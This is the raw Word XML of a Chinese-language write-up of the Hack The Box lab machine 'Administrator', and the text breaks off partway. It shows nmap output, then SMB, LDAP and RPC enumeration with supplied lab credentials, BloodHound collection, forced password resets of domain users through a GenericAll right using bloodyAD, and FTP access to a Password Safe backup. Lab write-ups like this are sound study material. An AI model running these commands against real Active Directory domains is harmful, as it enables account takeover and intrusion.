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F960C" w14:textId="4BF2CCE8" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启靶机拿到</w:t>
      </w:r>
      <w:r w:rsidRPr="00E07D9F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="09159297" wp14:editId="3BDF42A3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-8667</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>33484</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="3019425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21532"/>
                <wp:lineTo x="21532" y="21532"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1994073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73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IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A29A512" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAE7883" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t xml:space="preserve">| ftp-syst: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3251EC51" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>|_  SYST: Windows_NT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE3B825" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1C1951" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-12-26 06:29:36Z)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630402E7" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF046E3" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDC4CAE" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D767D5D" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>445/tcp   open  microsoft-ds? syn-ack ttl 127</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B41D92" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>464/tcp   open  kpasswd5?     syn-ack ttl 127</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DF3A23" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C63139" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255B2FC0" w14:textId="1415D0E0" w:rsidR="00E07D9F" w:rsidRPr="00E47AD0" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E47AD0">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)</w:t>
      </w:r>
      <w:r w:rsidR="00E47AD0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> winrm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36439CA3" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>|_http-server-header: Microsoft-HTTPAPI/2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADCE26B" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>|_http-title: Not Found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E70E77" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>59061/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4922E523" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>59072/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABD5DDC" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>59077/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC69B36" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>59088/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373D3BBD" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>59124/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43298253" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>60210/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A797AA1" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1162291D" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F"/>
    <w:p w14:paraId="7DD000F8" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>Host script results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC21637" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">| smb2-time: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DB1A04" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>|   date: 2024-12-26T06:30:35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4781E3B8" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>|_  start_date: N/A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D09E2A2" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t xml:space="preserve">| p2p-conficker: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F48440E" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>|   Checking for Conficker.C or higher...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7267B9CE" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>|   Check 1 (port 35406/tcp): CLEAN (Couldn't connect)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1050032F" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>|   Check 2 (port 16440/tcp): CLEAN (Couldn't connect)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6896D28D" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>|   Check 3 (port 52617/udp): CLEAN (Timeout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D185910" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>|   Check 4 (port 22303/udp): CLEAN (Failed to receive data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1DC5F5" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>|_  0/4 checks are positive: Host is CLEAN or ports are blocked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53400751" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>|_clock-skew: 6h45m09s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A659AEC" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t xml:space="preserve">| smb2-security-mode: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F52A2D" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t xml:space="preserve">|   3:1:1: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AB1671" w14:textId="065FBD0B" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F" w:rsidP="00E07D9F">
      <w:r>
        <w:t>|_    Message signing enabled and required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500AF407" w14:textId="7520B462" w:rsidR="00473BF8" w:rsidRDefault="00E07D9F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描结果如上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AE5DCF" w14:textId="09B6264F" w:rsidR="00735D64" w:rsidRDefault="00735D64">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用初始用户扫描smb目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FD6518" w14:textId="756596E7" w:rsidR="00E07D9F" w:rsidRDefault="00735D64">
      <w:r w:rsidRPr="00735D64">
        <w:t xml:space="preserve">crackmapexec smb </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10.10.11.42</w:t>
      </w:r>
      <w:r w:rsidRPr="00735D64">
        <w:t xml:space="preserve"> -u Olivia -p 'ichliebedich' --shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F77D59" w14:textId="77777777" w:rsidR="00E07D9F" w:rsidRDefault="00E07D9F"/>
    <w:p w14:paraId="383FB1E5" w14:textId="77777777" w:rsidR="00735D64" w:rsidRDefault="00735D64" w:rsidP="00735D64">
      <w:r>
        <w:t>SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E986D76" w14:textId="77777777" w:rsidR="00735D64" w:rsidRDefault="00735D64" w:rsidP="00735D64">
      <w:r>
        <w:t xml:space="preserve">SMB         10.10.11.42     445    DC               [+] administrator.htb\Olivia:ichliebedich </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AC4ED0" w14:textId="77777777" w:rsidR="00735D64" w:rsidRDefault="00735D64" w:rsidP="00735D64">
      <w:r>
        <w:t>SMB         10.10.11.42     445    DC               [+] Enumerated shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455860A6" w14:textId="77777777" w:rsidR="00735D64" w:rsidRDefault="00735D64" w:rsidP="00735D64">
      <w:r>
        <w:t>SMB         10.10.11.42     445    DC               Share           Permissions     Remark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A808709" w14:textId="77777777" w:rsidR="00735D64" w:rsidRDefault="00735D64" w:rsidP="00735D64">
      <w:r>
        <w:t>SMB         10.10.11.42     445    DC               -----           -----------     ------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC95017" w14:textId="77777777" w:rsidR="00735D64" w:rsidRDefault="00735D64" w:rsidP="00735D64">
      <w:r>
        <w:t>SMB         10.10.11.42     445    DC               ADMIN$                          Remote Admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49126ACE" w14:textId="77777777" w:rsidR="00735D64" w:rsidRDefault="00735D64" w:rsidP="00735D64">
      <w:r>
        <w:t>SMB         10.10.11.42     445    DC               C$                              Default share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6298429E" w14:textId="77777777" w:rsidR="00735D64" w:rsidRDefault="00735D64" w:rsidP="00735D64">
      <w:r>
        <w:t>SMB         10.10.11.42     445    DC               IPC$            READ            Remote IPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064082D1" w14:textId="77777777" w:rsidR="00735D64" w:rsidRDefault="00735D64" w:rsidP="00735D64">
      <w:r>
        <w:t xml:space="preserve">SMB         10.10.11.42     445    DC               NETLOGON        READ            Logon server share </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E41A97" w14:textId="73E7301D" w:rsidR="00E07D9F" w:rsidRDefault="00735D64" w:rsidP="00735D64">
      <w:r>
        <w:t>SMB         10.10.11.42     445    DC               SYSVOL          READ            Logon server share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8AEDA9" w14:textId="135D2CA1" w:rsidR="00E07D9F" w:rsidRDefault="00735D64">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未发现有什么价值的信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52559F06" w14:textId="60429662" w:rsidR="00E07D9F" w:rsidRDefault="00BB1BF8">
      <w:r w:rsidRPr="00BB1BF8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="75901EF7" wp14:editId="3500EE94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640080"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21214"/>
                <wp:lineTo x="21532" y="21214"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1909997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97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4A8E6" w14:textId="09A3319F" w:rsidR="00BB1BF8" w:rsidRDefault="00BB1BF8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以登陆winrm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5CF585" w14:textId="36F9F72C" w:rsidR="00BB1BF8" w:rsidRDefault="00114111">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用bloodhound进行信息采集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5127DD44" w14:textId="5C21FD80" w:rsidR="00114111" w:rsidRDefault="00114111">
      <w:r w:rsidRPr="00114111">
        <w:t xml:space="preserve">netexec ldap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10.10.11.42</w:t>
      </w:r>
      <w:r w:rsidRPr="00114111">
        <w:t xml:space="preserve"> -u olivia -p ichliebedich  --bloodhound --collection All --dns-server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10.10.11.42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33238BB1" w14:textId="4E509831" w:rsidR="00BB1BF8" w:rsidRDefault="003C5BD4">
      <w:r w:rsidRPr="003C5BD4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="04EB62E6" wp14:editId="553DD5E3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5274310" cy="965835"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21302"/>
                <wp:lineTo x="21532" y="21302"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1445020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20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E78B4" w14:textId="47AA9EF2" w:rsidR="003C5BD4" w:rsidRDefault="003C5BD4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>收集后会以时间命名的压缩包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6420BDA9" w14:textId="2E416569" w:rsidR="005A70BC" w:rsidRDefault="005A70BC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面收集域用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3167767D" w14:textId="5C0E2757" w:rsidR="005A70BC" w:rsidRPr="005A70BC" w:rsidRDefault="005A70BC" w:rsidP="005A70BC">
      <w:r w:rsidRPr="005A70BC">
        <w:t xml:space="preserve">rpcclient -U  "Olivia%ichliebedich" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10.10.11.42</w:t>
      </w:r>
      <w:r w:rsidRPr="005A70BC">
        <w:t xml:space="preserve"> -c "enumdomusers"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4915CFC0" w14:textId="77777777" w:rsidR="00365D06" w:rsidRDefault="00365D06" w:rsidP="00365D06">
      <w:r>
        <w:t>user:[Administrator] rid:[0x1f4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CFCB52" w14:textId="77777777" w:rsidR="00365D06" w:rsidRDefault="00365D06" w:rsidP="00365D06">
      <w:r>
        <w:t>user:[Guest] rid:[0x1f5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B7E913" w14:textId="77777777" w:rsidR="00365D06" w:rsidRDefault="00365D06" w:rsidP="00365D06">
      <w:r>
        <w:t>user:[krbtgt] rid:[0x1f6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3475410A" w14:textId="77777777" w:rsidR="00365D06" w:rsidRDefault="00365D06" w:rsidP="00365D06">
      <w:r>
        <w:t>user:[olivia] rid:[0x454]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114CECE2" w14:textId="77777777" w:rsidR="00365D06" w:rsidRDefault="00365D06" w:rsidP="00365D06">
      <w:r>
        <w:t>user:[michael] rid:[0x455]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F28622F" w14:textId="77777777" w:rsidR="00365D06" w:rsidRDefault="00365D06" w:rsidP="00365D06">
      <w:r>
        <w:t>user:[benjamin] rid:[0x456]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4B74DF" w14:textId="77777777" w:rsidR="00365D06" w:rsidRDefault="00365D06" w:rsidP="00365D06">
      <w:r>
        <w:t>user:[emily] rid:[0x458]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CF7A02" w14:textId="77777777" w:rsidR="00365D06" w:rsidRDefault="00365D06" w:rsidP="00365D06">
      <w:r>
        <w:t>user:[ethan] rid:[0x459]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A888740" w14:textId="77777777" w:rsidR="00365D06" w:rsidRDefault="00365D06" w:rsidP="00365D06">
      <w:r>
        <w:t>user:[alexander] rid:[0xe11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641952B7" w14:textId="72B98B12" w:rsidR="003C5BD4" w:rsidRDefault="00365D06" w:rsidP="00365D06">
      <w:r>
        <w:t>user:[emma] rid:[0xe12]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EEF709" w14:textId="1026A7C0" w:rsidR="003C5BD4" w:rsidRDefault="003C5BD4"/>
    <w:p w14:paraId="70030AC9" w14:textId="77777777" w:rsidR="006D7A11" w:rsidRDefault="006D7A11"/>
    <w:p w14:paraId="050AB175" w14:textId="3E521C40" w:rsidR="006D7A11" w:rsidRDefault="006D7A11">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将收集的压缩包导入bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EACC684" w14:textId="77777777" w:rsidR="003C5BD4" w:rsidRDefault="003C5BD4"/>
    <w:p w14:paraId="5EB80E46" w14:textId="77777777" w:rsidR="003C5BD4" w:rsidRDefault="003C5BD4"/>
    <w:p w14:paraId="1FF25819" w14:textId="0D4C70AD" w:rsidR="003C5BD4" w:rsidRDefault="00906CE2">
      <w:r w:rsidRPr="00906CE2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="488B55CB" wp14:editId="24672863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2447290"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21353"/>
                <wp:lineTo x="21532" y="21353"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1477702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02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FFA78" w14:textId="4D346456" w:rsidR="00BB1BF8" w:rsidRDefault="00906CE2">
      <w:r w:rsidRPr="00906CE2">
        <w:t>在bloodhound里看到，olivia用户对michael用户具有GenericAll权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E35902" w14:textId="09DA40FA" w:rsidR="00690A1F" w:rsidRDefault="00690A1F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用bloodAD来更改michael的密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D1F127" w14:textId="6F6AC453" w:rsidR="00BB1BF8" w:rsidRPr="00690A1F" w:rsidRDefault="00690A1F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--host</w:t>
      </w:r>
      <w:r>
        <w:t>””</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -d</w:t>
      </w:r>
      <w:r>
        <w:t>””</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:r>
        <w:t>“”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:r>
        <w:t>“”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> set password micheal </w:t>
      </w:r>
      <w:r>
        <w:t>‘’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E37882F" w14:textId="3D136F22" w:rsidR="00BB1BF8" w:rsidRDefault="00F873BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改好后再以michael为起始点再次进行相同操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5701197E" w14:textId="3478860A" w:rsidR="00F873BD" w:rsidRDefault="00F873BD">
      <w:r w:rsidRPr="00F873BD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BB0215" wp14:editId="374B87F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2625725"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21469"/>
                <wp:lineTo x="21532" y="21469"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1961975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75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120B0" w14:textId="1724D066" w:rsidR="00F873BD" w:rsidRDefault="00F873BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据提示强制修改benjamin用户密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C356351" w14:textId="5054A680" w:rsidR="00F873BD" w:rsidRDefault="00F873BD">
      <w:r w:rsidRPr="00F873BD">
        <w:t>python bloodyAD.py  --host "10.10.11.42" -d "administrator.htb" -u "michael" -p "P@ssword123" set password benjamin 'P@ssword123'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B2E051" w14:textId="1666834B" w:rsidR="00F873BD" w:rsidRDefault="005A1EEF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后登入ftp服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7785D4" w14:textId="032D5DA4" w:rsidR="00F873BD" w:rsidRDefault="005A1EEF">
      <w:r w:rsidRPr="005A1EEF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E6E1E5D" wp14:editId="618FC20F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259715"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20597"/>
                <wp:lineTo x="21532" y="20597"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="688482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8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65E7F" w14:textId="5CDE9008" w:rsidR="00F873BD" w:rsidRDefault="005A1EEF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现备份的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213A0A46" w14:textId="67192CC8" w:rsidR="00F873BD" w:rsidRDefault="005A1EEF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过查询得知是psafe的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A63274" w14:textId="08E5FC24" w:rsidR="005A1EEF" w:rsidRDefault="005A1EEF">
      <w:r w:rsidRPr="005A1EEF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
